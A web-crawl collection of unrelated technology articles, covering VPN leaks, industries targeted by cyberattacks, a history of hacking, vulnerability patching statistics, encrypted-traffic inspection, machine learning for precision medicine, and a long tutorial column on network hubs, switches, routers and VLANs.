- If the displayed IP is similar to your ISP’s IP, then your identity is being exposed through WebRTC leak.
You can prevent WebRTC leaks by manually disabling WebRTC or by downloading an extension for WebRTC leak prevention. However, setting changes are only available in Mozilla Firefox. A browser add-on is available for other web browsers including Chrome, Opera and Yandex.
•Zehra Ali is a tech journalist specialising in the infosec sector. This article originally appeared on Security Boulevard | <urn:uuid:a7d2a2b3-42bc-42c9-b68e-229d6052c306> | CC-MAIN-2022-40 | https://news.networktigers.com/cybersecurity-news/how-to-understand-and-prevent-vpn-leaks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00288.warc.gz | en | 0.914187 | 1,368 | 2.71875 | 3 |
However, cybercriminals target some industries at disproportionally high rates. Here are four of them:
Since health care professionals deal with life-or-death situations, cyberattacks could hinder both productivity and patient care to a tremendous degree. Some attacks shut down entire health systems comprising multiple facilities or forcing affected individuals to switch from computerized processes to using pens and paper.
The medical industry faces an exceptional risk for cyberattacks because there are so many players involved in the sector. More than 83 percent of organizations responding to a recent survey reported making new or improved organizational security enhancements.
That’s notable progress, but analysts also worry about the potential for attacks that don’t directly target hospitals or similar organizations. Recent demonstrations from cybersecurity researchers have shown how it’s possible to hack into medical devices like pacemakers or insulin pumps.
There are also instances of hospitals being unable to perform fundamental services. In November 2018, a ransomware attack forced two hospitals to send ambulances elsewhere and only accept walk-up patients to the emergency rooms.
Hackers know they can wreak substantial havoc by attacking hospitals, thereby increasing the potential for notoriety. It doesn’t hurt that those organizations keep medical records containing valuable information hackers could sell on the black market. One instance with North Carolina-based company Atrium Heath potentially breached the data of 2.65 million people.
Nonprofits typically focus their efforts on causes that improve society at large, at-risk groups and others in need. However, cyberattacks could thwart all those intentions to put energy toward the greater good. Research indicates cyberattacks threaten nonprofit organizations for various reasons.
Data from 2017 found only 27 percent of nonprofits broke even that year. So, if nonprofit leaders want to devote more money to cybersecurity, they may feel too financially strapped to make meaningful progress. Plus, many nonprofits have small teams of hired employees and rely heavily on volunteers otherwise. That bare-bones staffing structure could make it harder than average for nonprofits to recover after issues happen.
Also, nonprofits may feel overwhelmed about where to start as they learn about cybersecurity. Fortunately, some products geared toward nonprofits have robust integrated security. Volgistics is a company associated with volunteer management that serves 5,121 organizations. A section on its website details the online and offline measures taken to keep customer data safe.
The retail industry is cyclical, so certain times of the year — including the holiday season or when kids go back to school — are particularly busy. Plus, cybercrime problems could take websites offline or cause reputational damage. Despite those risks, retailers make blunders when budgeting for cybersecurity. A recent report found 50 percent of all data breaches in the U.S. happened at retail establishments.
The study also determined that entities spend the most money on cybersecurity measures considered among the least effective. No matter what, it’s crucial for the retail sector to take cybersecurity seriously. Research from Gemalto found 70 percent of people would stop doing business with companies that suffer data breaches. So, failing to conquer the problem could lead to profit losses in unexpected ways.
People rely on banks to do daily transactions for business or personal reasons. And, since financial institutions have extraordinary amounts of money on hand, it’s not surprising they’re prime targets for cybercriminals. Even financial industry businesses that don’t store so many financial resources on site — such as wealth management companies — keep documents filled with clients’ personal details.
The financial sector is also so potentially lucrative for hackers that they may set their sights on carrying out attacks on ATMs in multiple countries. Sources report a North Korean hacking group known as Lazarus is believed to be behind attacks in 23 countries totaling tens of millions of dollars.
There’s an emerging trend of banks hiring ethical hackers to find vulnerabilities and test existing safeguards. That’s a practical way to address cybercrime risks, but it’s an approach that’ll likely become increasingly harder to choose. That’s because there’s already a gigantic cybersecurity skills gap consisting of hundreds of thousands of open cybersecurity positions, and forecasts say the shortage will get worse.
Any sector that uses the internet to conduct business could become a cybercriminal’s target.
Although the industries mentioned here need to take particular care to prevent issues, proactive steps taken to fix problems and monitor for suspicious issues could keep all companies safer from cybercrime.
Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her re
(Security Affairs – Cybersecurity, cyberattacks) | <urn:uuid:0bf88e93-a994-42ec-a072-f6b0af88b88d> | CC-MAIN-2022-40 | https://securityaffairs.co/wordpress/78667/security/4-industries-cyberattacks.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00288.warc.gz | en | 0.942913 | 941 | 2.5625 | 3 |
Are We Doomed to Repeat the Past When it Come to Hacking?
On an almost weekly basis, another organization or government agency owns up to having been “hacked” – admitting that its systems have been breached. For every company that discloses an issue, there are likely 20 – 30 more that keep it under wraps. We know this because more than half of all U.S. businesses have been hacked. The attacker may have removed sensitive personal data or trade secrets for later sale on the dark web, or sought to disrupt operations, causing negative reputational and financial impact. But regardless of attacker motivation, cybercrime damages are predicted to cost the world $6 trillion dollars in damages annually by 2021.
George Santayana gave us the great quote, “Those who cannot remember the past are condemned to repeat it.” Unfortunately, we haven’t been particularly good students of history – at least in terms of protecting our critical infrastructure from hackers.
An auspicious precedent from the old world
During the 1790’s, France built what could be considered the first national data network – a mechanical telegraph system, reserved for government use, and comprised of a chain of towers with a system of moveable wooden arms. These arms were configured to correspond to letters, numbers and other characters.
Operators would view an adjacent tower through a telescope and match its configuration, allowing messages to be relayed faster than mail. The first network attack occurred when a telegraph operator in Tours, France, was bribed by bankers Francois and Joseph Blanc in 1834. He introduced errors into government messages, surreptitiously indicating the previous day’s market movement. This scheme allowed the brothers to profit from their knowledge ahead of others
Computer nerds rule
The minutes of a 1955 meeting of MIT’s Tech Model Railroad Club, state “Mr. Eccles requests that anyone working or hacking on the electrical system turn the power off to avoid fuse blowing.” Since then, a hack has been associated with a type of shortcut, or a way to rework the operation of a system. The Club members then moved to apply their engineering know-how to the new computers on campus (IBM 704’s). Many of these students and other early hackers were programmers who wanted to optimize, customize and/or just learn. The most elegant hack from the late 1960’s was that of Thompson and Ritchie, who worked on a “little used PDP-7 in a corner of Bell Labs” and developed what became the UNIX operating system.
Phones can be hacked, too
In the 1970s, phone hackers also known as “phreakers” exploited operational characteristics of the newly all-electronic telephone switching system to make long-distance calls free of charge. One of the hacks was the use of a toy whistle found in Cap’n Crunch cereal boxes that produced the 2600 hertz tone which fooled the network. Apple founders Steve Jobs and Steve Wozniak were phreakers who built blue boxes with digital circuits emulating network tones before they went on to found their wildly successful company.
Hacking gains a place in popular culture and law
In 1981, IBM introduced “personal computers” as standalone machines complete with CPU, software, memory, and storage. The wider availability of PCs led to an uptick in hacking, helped along by the movie “War Games.” The film follows a young hacker who changes his grades after breaking into his school district’s computer. He winds up finding a backdoor to a military supercomputer and runs a nuclear war simulation, thinking it’s a computer game, and almost starts World War III. During this era, a different strain of hackers more focused on pirating code, breaking into systems, and stealing data, came to the fore. Congress responded in 1986 with the Computer Fraud and Abuse Act,intended to reduce the hacking of government or other sensitive institutional computer systems, with punishment ranging from fines to imprisonment. Several high-profile hackers were prosecuted in the 1990’s for crimes including stealing proprietary software from corporations, launching the first computer worm, and leading the first digital bank heist.
It’s the Wild West all over again
Since then, the practice of hacking continues to thrive in our worldwide ecosystem of connected networks, virtual machines, embedded systems, smart devices, and cloud computing. The data breaches at Yahoo!, Equifax, eBay, and Target, among other big names, are well known. What may be more alarming is the fact that, according to experts, cybercriminals made more than $1 billion from ransomware (a particularly nasty form of malware) in 2016. Consider the mayhem caused when hackers set their sights on government and critical infrastructure. Exhibit A is the digital extortion that brought down the city of Atlanta for days this past March. During the same month, the Department of Homeland Security and the FBI warned that Russian operatives had infiltrated the U.S. electric power grid. At a DefCon conference in Las Vegas earlier this month, an 11-year-old needed only ten minutes to hack into a replica of the Florida Secretary of State website used to report election results, and change them.
Critical Infrastrucuture must assume hackers will get in
It’s time to learn from the both the long-ago and recent past: suppliers, manufacturers, and operators of critical infrastructure need to protect their organizations to maintain customer safety and loyalty, as well as business continuity. Vulnerabilities in software, large attack surfaces, and unverified supply chains are present in virtually all organizations.
One of the best ways to guard against the damage and disruption wrought by hackers is to transform software binaries within devices and systems in a way that denies malware the ability to change commands and spread. Known as “cyberhardening,” this method prevents a single exploit from propagating across multiple systems. It shrinks attack surfaces, eliminates vulnerabilities, and stops malware from being executed. Read more about this transformation process here.
Originally this article was published here.
This article was written by Lisa Silverman, VP of Marketing at RunSafe Security. She is an accomplished executive with broad experience in utilizing new technology to expand product portfolios and address customer needs. Lisa’s background includes product management, marketing, and strategic planning for both large enterprises and small businesses. | <urn:uuid:c9236e8d-cc1d-4891-b540-3780b8ced3c8> | CC-MAIN-2022-40 | https://www.iiot-world.com/ics-security/cybersecurity/are-we-doomed-to-repeat-the-past-when-it-come-to-hacking/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00288.warc.gz | en | 0.951803 | 1,309 | 2.953125 | 3 |
Most vulnerabilities exploited in the wild are years old and some could be remedied easily with a readily available patch.
This is one of the findings of a new report from security firm Edgescan, which states that two thirds (65 percent) of CVEs found in 2020 were more than three years old, while a third of those (32 percent) were originally identified in 2015 or earlier.
The oldest vulnerability (opens in new tab) in circulation last year was CVE-1999-0517, which was first identified at the turn of the millennium.
Most common malware-related vulnerabilities, the report further states, are between one and three years old, many of which could be fixed with an already available patch. Despite this fact, it takes businesses 84 days on average to patch high-risk vulnerabilities.
According to the report, PHP is “by far” the most insecure framework, accounting for almost a quarter (22.7 percent) of all critical risks (opens in new tab) found last year. Further, more than a tenth (13.4 percent) of all critical risks were linked to either unsupported, unpatched or outdated systems.
“We still see high rates of known (i.e. patchable) vulnerabilities which have working exploits in the wild, used by known nation states and cyber-criminal groups. So yes, patching and maintenance are still challenges, demonstrating that it is not trivial to patch production systems”, said Eoin Keary, CEO and founder of Edgescan.
- Best business antivirus (opens in new tab) of 2021 | <urn:uuid:9366c520-a921-49d7-a6da-cd97ee8eaf83> | CC-MAIN-2022-40 | https://www.itproportal.com/news/most-security-bugs-in-the-wild-are-multiple-years-old/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00288.warc.gz | en | 0.973776 | 326 | 2.59375 | 3 |
Today—January 28th—is known as Data Privacy Day (or, in the European Union, Data Protection Day) in the United States, Canada, Israel, and the 47 EU countries in which it is observed.
Privacy—especially data privacy—is vital. Many national constitutions—in fact, over 150 of them—mention the “right to privacy.” It’s also been mentioned in the United Nations' Universal Declaration of Human Rights, and is protected under the European Convention on Human Rights. There have been a number of privacy regulations enacted in many countries, regions, and states, including the EU’s General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA).
The focus of Data Privacy Day is to raise awareness for businesses and consumers on the importance of protecting the privacy of users and their personal information. It’s meant to educate and encourage the development of tools for businesses and consumers to better manage and control user personal information. It’s also meant to drive increased or enhanced compliance with existing privacy laws and regulations, like GDPR and CCPA. Many international and national agencies, ministries, and councils, as well as educational institutions and industry consortiums, recognize Data Privacy Day as a time to commence or continue discussions on how to better protect the privacy of consumer and user data.
One of the most popular and best ways to increase privacy for consumer and user data, whether at rest or in transit, is via encryption. Encrypting consumer and user data and the methods of transmitting this data, is vital to keeping private personally identifiable information.
Today, encryption is ubiquitous. The attention on user and data privacy has helped to drive the explosion in encrypted traffic. In addition, there are many vendors now providing free or low-cost certificates in an effort to improve online security, which would benefit users, consumers, and businesses. In essence, they are trying to encrypt the entire web! According to F5 Labs, 86% of web page loads are new encrypted with SSL or TLS. And Advanced Encryption Standard (AES) cipher accounts for over 96% of today’s encrypted web traffic. The aforementioned privacy regulations and requirements like GDPR, CCPA, and others are driving the adoption of encryption, even if most of these regulations and requirements do not mandate encryption of user and personal data. However, many organizations will use encryption for user data and communications so that they don’t infringe upon those same regulations and requirements.
While encryption is excellent at delivering privacy for users and their data, there is at the same time a problem with encryption, creating a serious conundrum for users and businesses alike: Attackers and hackers also love to use encryption to mask malware, ransomware, and other attack vectors. Encryption enables a security blind spot, unfortunately.
For instance, fraudulent websites used in phishing and spearphishing campaigns are increasingly using HTTPS to appear genuine in order to trick unsuspecting users into clicking on malware-infected links or to insert their username and password into convincing but phony login pages—and they even dupe users who have accepted the appearance of the little padlock in the address bar as being indicative of a safe, secure website. According to F5 Labs, 72% of phishing sites now use encryption. But, to make matters worse, not only are attackers, hackers, and other bad actors using encryption to hide threats; they’re also taking advantage of the privacy cryptography enables to evade detection from post-mortem forensics simply by using a specific threat campaign that includes malware and phishing sites only one time per victim.
Phishing is a very difficult attack to defend against because it exploits human psychology, leveraging social engineering, and mis- and dis-information. Phishing leverages human nature and emotions, such as fear. This is especially true during the coronavirus pandemic. And attackers know this and use it to their advantage. F5 Labs found that new HTTPS certificates containing the words “covid” or “corona” increased at the same time as spikes in COVID-19 cases. Even well-known healthcare sources like the World Health Organization (WHO) and the U.S. Centers for Disease Control and Prevention (CDC) have been and continue to be impersonated by attackers in targeted phishing campaigns that attempt to lure victims to malicious domains and download malware or other malicious attacks, or to trick them into typing in their user credentials into fake login pages.
So, how can an organization today defend the privacy of user and consumer data and personal information, while protecting itself from various attacks and breaches?
Organizations should employ a solution that can decrypt at scale the onslaught of encrypted traffic required daily for incoming and outgoing traffic. With the level of encrypted traffic today, the need to ensure user and consumer data privacy, and the computationally intensive task of decryption and re-encryption, leveraging an existing security solution to pull double-duty to deliver security and decrypt and re-encrypt traffic is a bad idea. An overloaded, overworked security device may simply begin bypassing encrypted traffic or not perform the security duties for which it was deployed.
To ensure the privacy and security of user and consumer data, and in an effort not to impinge on privacy regulations and requirements, organizations should employ a solution that intelligently enables user and consumer traffic that is private—such as financial or healthcare data—to bypass decryption. That traffic shouldn’t get a free pass, though, but should be inspected by a limited set of solutions in the security stack. However, this can only be achieved if the solutions in the security stack are not in a static daisy-chain, but are allowed to participate in dynamic security service chains, leveraging context-aware policies to route incoming encrypted traffic, once decrypted, to the appropriate security service chain.
This is called SSL orchestration and the description above (hopefully) illustrates why it is so necessary today, not only to ensure organizational security, but to also confirm that user and consumer information is protected and kept private.
For more information on F5 SSL Orchestrator, please click here. | <urn:uuid:181f72b1-4446-4a15-b095-e1542ec4c671> | CC-MAIN-2022-40 | https://www.f5.com/company/blog/how-to-ensure-data-privacy-and-organizational-security | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00288.warc.gz | en | 0.93552 | 1,257 | 3.03125 | 3 |
‘Precision medicine’ refers to the tailoring of medical treatment depending on a patient’s individual characteristics, e.g., genes, environmental factors, and lifestyle. If physicians could accurately predict an individual patient’s responses to different treatment options, the best option could be selected. For most diseases, the efficacy and safety of standard treatments are highly variable. Thus, individual-specific treatment protocols have been hailed as an emerging revolution in medicine, with the potential to improve patient care and deliver cost savings to health services .
Copyright by Felix Beacher via www.mdpi.com
Currently, precision medicine in real-world clinical practice is mainly associated with treatment based on cancer subtype and genotype. For example, olaparib is a monotherapy for ovarian cancer in women with BRCA1/2 mutations . However, there are still few examples of real-world precision medicine. Current clinical practice still relies heavily on subjective judgment and limited individual patient data . A ‘one-drug-fits-all’ approach is often used, in which a particular diagnosis leads to a specific type of treatment. Alternatively, trial-and-error practices are common, in which various treatment options are tried in the hope that one will work.
Machine learning (ML) has been described as ‘the key technology’ for the development of precision medicine . ML uses computer algorithms to build predictive models based on complex patterns in data. ML can integrate the large amounts of data required to “learn” the complex patterns required for accurate medical predictions. ML has excelled in diagnostics, e.g., in neurodegenerative diseases , cardiovascular disease , and cancer . ML approaches have also been used to predict treatment outcomes for a range of conditions, including schizophrenia , depression , and cancer .
In 2014, IBM launched ‘Watson for Oncology,’ which aimed to use ML to recommend treatment plans for cancer, based on combined inputs from research, a patient’s clinical notes, and the clinician . However, this project has so far failed to deliver the kinds of commercial products which had been envisioned . Other reports have used ML to predict treatment outcomes for cancer. One study used ML to predict patient survival based on microscopy images of cancer biopsy tissue and genomic markers . Another study used ML to predict response to treatment in patients with cervical and head cancers based on PET images . Despite such advances, there are currently no ML-based tools approved by regulators.
A significant limitation of these kinds of exploratory approaches to ML-based tools for clinical practice is that they tend to rely on types of data that are expensive to collect and may require specialist skills to analyze (e.g., genomics or MRI/PET imaging). This limitation can be a barrier to translating systems into tools for routine clinical practice. One possible way to address this is to base such systems on data from Phase III clinical trials: studies that provide the pivotal data for regulators to assess whether a new drug should be commercially approved. Phase III clinical trials are typically large enough for ML (usually 1000+ subjects) and include a wide range of data (e.g., demographic, clinical, and biochemical), which can be easily stored in tabular format. Moreover, the current trend is towards making clinical trial datasets publicly available. Thus, Phase III clinical trial data may be a good source for developing practical ML-based tools for precision medicine. This approach is relatively untried: a literature search revealed only one prior study that used clinical trial data to predict treatment responses . This study used ML to predict responses to an anti-depressant after 12 weeks. This was an important first step, however the accuracy level was modest (65%). It is possible that, with different data, and with a different approach to modeling, a level of accuracy could be achieved which could lead to the development of tools for real-world clinical practice. […]
Read more: www.mdpi.com | <urn:uuid:6591eeee-dd7b-46b0-acad-aa7a25749a34> | CC-MAIN-2022-40 | https://swisscognitive.ch/2021/07/19/research-paper-machine-learning/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00488.warc.gz | en | 0.941098 | 837 | 3.453125 | 3 |
Your Network's Traffic Cops
Understand how hubs, switches, and routers direct traffic on your network.
- By Bill Heldman
we talked about the cabling in your building and the MDF and
IDFs. Remember that great admins know a heck of a lot more about their
network than just the server farmyour goal should be to fully understand
your network's components, something we collectively call the infrastructure.
This month we'll dig into the switches, hubs and routers, interesting
boxes (but not dreadfully complicated, at least in basic installations)
that act as the traffic cops for your network. If you understand why
you'd choose switches over hubs, when you need a router, and how all of
these devices hook together and talk to one another, you'll be a long
way down the road toward a thorough understanding of networks as a whole.
Switches and Hubs
As a general rule of thumb, the patch panel isn't where you'll connect
computing gear. All users and most servers will connect to switches or
hubs. The wiring coming in from an office is connected to the rear of
the patch panel. Then a patch cable is run from that port to a port on
the switch or hub; see the double-dashed lines in Figure 1. In the figure,
you can also see that the switches connect by a special port called the
uplink port to another switch (the dotted lines). Switches that are connected
in this fashion are called stacked switches. Routers usually connect to
a port on the same switches and hubs as the servers and users. The idea
is that all computing devices eventually connect to a port on your switches
or hubs. Users simply have a longer way to go before they connect up to
a switch or hub.
|Figure 1. Server A is connected to an Ethernet
port on a switch in the MDF. Server B is connected to a fiber port
on the same switch. Server C is connected to a fiber port on a switch
in the IDF. The two switches in the IDF are connected to one another
by a jumper cable on the uplink ports. Incoming wiring from offices
passes into the patch panel. Patch cables then run from the patch
panel jacks to the switches. In this way users can communicate with
the servers. Switch ports can be mixed and set for various data transfer
rates. Servers are connected to the backbone.
There are a lot of places for something to go wrong when you consider
the connectivity a user has with a server. The data has to pass from the
user's computer to the NIC, through a patch panel to the wall jack, through
the cabling running from the back of the wall jack to the back of the
patch panel at an IDF or MDF, out the front of the patch panel to a patch
cable connected to a switch or hub, through the switch's fabric
and out through a patch cable to the server. There are many places for
failure and we haven't even mentioned the cabling between an IDF and MDF!
You can also see how any one of these connections, if they're weak or
failing, might introduce some erratic behavior in a user's computing experience.
When troubleshooting erratic behavior on a single user workstation, start
with the NIC, testing the TCP/IP software, and work outward. You may have
to sniff the network or bring in a cabling expert to pinpoint the exact
difficulty. NICs that fail sometimes become chatty, putting out
excessive packets on the network and using up a lot of bandwidth in the
process. (Note: Windows NT Network Monitor software, now called
System Monitor in Windows 2000, can help you find chatty NICs.)
Why test the TCP/IP software? Because often a user can't communicate
due to incorrectly configured TCP/IP components. Start troubleshooting
by seeing if you can ping the loopback adapter (127.0.0.1), a failsafe
that tells you simply that the TCP/IP software is working correctly. Next,
see if you can ping your host's IP address, then ping a host adjacent
to the one you're on and finally try to ping a host across the backbone.
Be sure to attempt your pings by name and by IP address so that you validate
your name-server configurations. I can't tell you how often I've run into
problems that center around invalid name-server configurationsremember
that Windows software prefers either NetBIOS or DNS names as its preferred
path for locating hosts. Your erratic problem may not be hardware at alljust
a simple TCP/IP configuration. Looks like hardware, smells like hardware,
turns out to be software. D'oh!
Hubswhy you don't want them
Hubs are older devices that are dumb. What we mean by that is that
they don't have any intelligence built into them to effectively manage
the traffic between several computing devices (stations). Hubs simply
relay the data from one place to the other. You might think of hubs as
stop signs that assist with the management of traffic, but they really
don't have any capacity to interfere with traffic flow. This isn't a tight
analogy, but it gives you a sense of the lack of capability in hubs.
All data flowing from various stations into and out of a device such
as a hub is scrunched together so that the packets flow in an even line.
When we describe this process we use a more technical term than "scrunch"we
say that the data is multiplexed, or more tersely muxed. Figure
2 shows this in more graphic detail.
|Figure 2. Hubs mux, therefore they are dumb.
So hubs do muxing pretty well. But the problem is that they don't really
care about one station over another. If station A needs to transmit a
lot of data and it gets to the plate first, station B has to wait for
the hub to give it an opening and mux it out the door to its destination.
In other words, hubs don't intelligently manage the data. They simply
lack the brains for it. Additionally you can't define things such as Quality
of Service (QoS) circuits to give preferential treatment to one station
or kind of data over another or set up virtual pools of ports like you
can in switches. A hub is simply a pass-through point for the data. The
data is brought in and muxed out.
Hubs are fine in small environments such as a Small Office Home Office
(SOHO) environment, where you have a half-dozen computers and you're not
into heavily intense processing. But in a corporate environment of any
size, hubs aren't practical and will, at some juncture, begin to bog down
the network. Job One for an admin in a new position is to assess the hub/switch
infrastructure and get the hubs out of the picture, especially
if they're older, slower 10Base-T jobs that have been in operation a while.
(Recall from last column's conversation that 10Base-T means the data is
able to flow at a maximum of 10 million bitsnot bytes!per
second; not a tremendously fast data transfer rate in today's high-speed
Another interesting point to consider with hubs is that each port generally
has the same data transfer rate as all the others. Not only that, but
the uplink portthe place at which the hub connects to the networkis
usually also set for the same speed. You don't have to be Einstein to
figure out that if you have six or seven fast machines connected to 10Base-T
ports on an eight-port hub with the output directed out another 10Base-T
port, you've basically got a Southern California traffic jam. It's a simple
matter of understanding the bit flow.
A term you should be familiar with as you shop for these devices is port
density. Hubs and switches are sold by the number of ports that they have
(typically in increments of four or eight). The port density of an eight-port
hub is sevenbecause the uplink port utilizes one of the eight available.
If you have six machines connected, your port density is exhaustedit's
almost time to purchase a new device. Port density is something that good
admins will actively monitor in their IDFs and MDF. Nothing is worse than
to have a new employee arrive at an office in a wing of your building
only for you to realize that you're out of ports and can't hook up the
Also note that hub/switch vendors typically advertise their wares on
a per-port basis. It sounds more reasonable if a vendor can quote you
"Under $99 a port" than "This switch costs $2,999". When pricing out gear,
calculate the per-port price to make sure you're not getting raked.
Switches, better but more expensive
Switches, on the other hand, have a processor, code and a management
user interface (UI) built into them that can handle the intelligent management
of traffic between computing devices. This internal management of traffic
is a wonderful thing that greatly increases the overall performance of
the network. (If the Internet's networks were still using hubs, it would
be a very slow Internet indeed!) However, there's a price to pay for using
switches instead of hubs. You can see this for yourself by going to your
neighborhood computer store and pricing a little four- or eight-port hub
for your house. You'll find that you can obtain one for under $20. The
same number of ports in a switch, on the other hand, will cost close to
$100. You're paying for the intelligence that manages the switch's connectionsgenerally
onboard RISC processors. The same is true for corporate-class switches
and hubs. Plan on paying roughly an order of magnitude more for a switch
than for a hub of the same number of portsi.e., a 24-port hub might
cost $300 whereas a 24-port switch may cost anywhere from $1,500 to $3,000.
Where hubs are stop signs, switches are regular stoplights.
Another facet of switch technology that you may be interested in involves
buying a big chassis box, then adding the modules that you require as
your needs grow. This is interesting in the following way: Suppose that
you have a fiber-optic backbone on your network running at the gigabit
Ethernet data transfer rate (1000Base-T). You desire for your larger busier
servers to utilize the fiber backbone and your smaller servers and your
users to connect with Ethernet cable. Further, you want to give some of
your power users the ability to connect at 100Base-T, while the rest of
your user community will connect at 10Base-T (not a big deal for the average
user who is simply utilizing the Internet and e-mail).
This problem is easily solved with chassis-based switch cabinets that
allow you to purchase and slide in various modules that fit your needs.
You might buy a four-port fiber-optic module for your servers and two
24-port modules for your users. The ports on the switches can be adjusted
to accommodate 10/100 or 1000Base-T (we'll talk about auto-negotiation
in just a moment) so you can really get into the tuning of your network
in very explicit ways.
Sounds good, right? Well, be ready buck-o, because the price tag on these
units goes from a few thousand to tens of thousands of dollars. The UI
doesn't change much and the switches are really easy to configure and
manage, but the chassis overhead heavily drives up the cost. In some cases
you can also add redundant switch engines and power supplies so that you
have built-in fault-tolerance in your cabinets. When you purchase chassis-based
switches, you choose from an a la carte menu. Be prepared to get an education
in differences between fiber-optic jacks, backbone connections and so
forth. You can get in over your head very quickly.
Auto-negotiationthe worst invention in networking
Both Network Interface Cards (NICs) and switch ports have the ability
to detect the speed of their current connection. We call this auto-negotiation.
The NIC says "Hey! I need to send data, what speed should I send at?"
The switch gets the message and says "Send at 10Base-T" or "Send at 100Base-T"
or whatever. There's an added twist to this because the two can negotiate
whether they're going to talk one at a time (half-duplex) similar to a
cell-phone call, or they can carry on a two-way conversation (full-duplex),
as with a regular telephone call. So you have a myriad of choices a gigabit-rated
NIC and switch port can choose from:
- 10Base-T half-duplex
- 10Base-T full-duplex
- 100Base-T half-duplex
- 100Base-T full-duplex
- 1000Base-T half-duplex
- 1000Base-T full-duplex
What's your poison?
My problem with auto-negotiation is that for some reason, especially in
Windows networking, the two (switch port and NIC) seem to want to negotiate
to the least common denominator. If you've got sluggish servers or workstations,
chances are very good the NIC has detected 10-half while the port is trying
to talk at 100-full or some other goofy configuration. I've seen all kinds
of negotiations and they always create data transfer speed issues with
The secret? It's all about management. You have to be diligent about
setting the NIC software in your client computers and servers for a given
speed, then make sure that you set the switch ports to match. You'll help
yourself in more ways than you realize by simply being proactive about
the management of the negotiation between your hosts and their associated
ports. For example, suppose that you have a 24-port switch whose ports
are all rated for 10/100Base-T. You have 12 users. It's no big deal to
make sure that the bottom half of the switch (the ports are all numbered
so you know which ports you're adjusting) is set for 10Base-T Full. Then,
hook up your user computers to the bottom half of the switch and go into
each computer's NIC software to make sure it's negotiating at 10 Full.
You've matched the NIC to the port and you'll have a much happier network,
Note that NetWare servers (at least pre-NW 6) don't have the ability
for admins to go in and adjust the data transfer rate. Our NetWare 5.1
servers where I work are set for 100 Half and cannot be changed. Recently
we found that the switch ports they were connected to were auto-negotiating
andgo figurethey negotiated at 100 Full. As soon as we changed
the switch ports to match the 100 Half settings on the Netware boxes we
had instantly happier servers.
Tip: If you have a Netware/Windows shop, you're not doing yourself
any infrastructure favors by hosting the IPX protocol. Get it off of your
network as soon as possible and get to a completely native TCP/IP environment.
You'll be happy you did because it will cure a myriad of sluggish network
ills. More on that next time.
Layer 2 versus Layer 3 Switches
Some of today's switches have the ability to be not only switches (which
operate at the Data Link layer, or layer 2, of the OSI model) but also
as routers operating at the Network layer (layer 3), where conventional
hardware routers operate. By getting into layer 3 switches, as they're
called, you get out of the hardware router business, but add complexity
to the overall design of the switch fabric because now the switch is not
only handling the switching of data, but also routing it out the door
to other destinations.
For more information on the OSI model, go to www.webopedia.com
and key in OSI. You'll get all the information and links you need.
Virtual Local Area Networks (VLANs)
Another element that switches bring to the table are VLANs. If you go
through your CCNA training (see below) you'll get a hefty dose of what
VLANs are all about. Essentially the idea is that you want to segment
your traffic in a way that matches the logical usage of your network.
You might have a group of HR and financial folks that need to talk to
an ERP server all day long. This is a great use for VLAN technologythe
switches afford you a way to lump users together into a common unit that's
independent in the switch fabric from others, thus presenting a faster
user experience. VLANs can traverse switchesfor example, you can
have ports 8-16 of one switch and ports 4-12 of another all belong to
a single VLAN.
Remember this: VLANs must go through a router or layer 3 switch
to talk to other VLANs. No router, no inter-VLAN dialog.
While relatively easy to set up and manage, VLANs are definitely an advanced
networking topic and well out of the purview of junior admins. But know
that they exist and that your troubleshooting must take them into account.
Routers examine packets and make a decision about which direction to send
them in. Sounds simple, huh? It can get deep very quickly.
You can turn Windows NT/2000 Servers into routers. Windows 2000 especially
is good at being a router. However, the art of internetworking as it's
called, i.e. management of routers, is usually left to specialized individuals
who never touch servers and who usually insist on hardware devices to
do the routing. You'd use Windows 2000 routers only in smaller installations
or specialized cases.
Routing can become incredibly complicated when you consider the intermixing
of different WAN protocols and associated hardware coupled with the capabilities
of the router, so it's not a topic that's usually discussed in mixed context
with server administration.
That being said, let me say this about that. Lots of server admins desire
in their heart to get their Cisco Certified Internetwork Expert (CCIE)
certification. This is the holy grail of all network certifications
and is extremely difficult to obtain. Why do admins want it? I believe
it's because they've heard that CCIEs make six-figure salaries and they
have sexy jet-set jobs as router jocks.
True. But they also work 24/7/60-60, are on constant call-out, think
nothing of spending 10-12 days straight in router closets, rarely see
their families and generally get burned amazingly fast. I've known router
weenies (don't tell them I called them that) who worked four straight
days over Thanksgiving weekend getting some new routers goinggrabbing
some shut-eye in a cubicle while their partner continue configuring the
blasted routers! It is a terrible job and really worth much more
than six figures. Just an observance from your uncle Bill.
Understand This Stuff
|The CompTIA Network+ test will go a long
way in the switch and hub area of your education. However,
I would also recommend checking into Cisco's Certified
Network Asssociate (CCNA) certification. While the certification
is Cisco-centric (i.e. you'll have to learn what the latest
Cisco switchgear models are) all aspects of switching
in general are thoroughly covered and you'll be well prepared
to understand switching, regardless of the vendor. Sybex,
my publisher (www.sybex.com),
offers a complete line of Cisco certification study products,
including an e-virtual trainer that simulates the switch
and router configuration screens of various Cisco products.
(Check out www.bestbookbuys.com
for the very best in pricing for these and other materials.)
You can also get gobs of Cisco certification information
and news from TCPmag.com
Whew! There is a lot to know when you start getting into switches,
hubs and routersthe traffic cops of the network. They're really
fun cool boxes to work with and you shouldn't be afraid of them. But you
should get into an education about the technology before you try to implement
it. There is no better way to do this than pick up a switch for your home
network and mess around with it a little. In fact, you might be able to
find a used 3COM SuperStack 3000 or similar device from Cisco, Bay (Nortel)
or other vendor that you could pick up for a song, then practice setting
it up, breaking it down, and reconfiguring the whole mess yet again.
Next month we talk about another huge subjectprotocols and their
import on the whole network infrastructure. Remember that the infrastructure,
like a highway, is there for the data that traverses it, so it's important
that you adequately manage the protocols going across it in order to assure
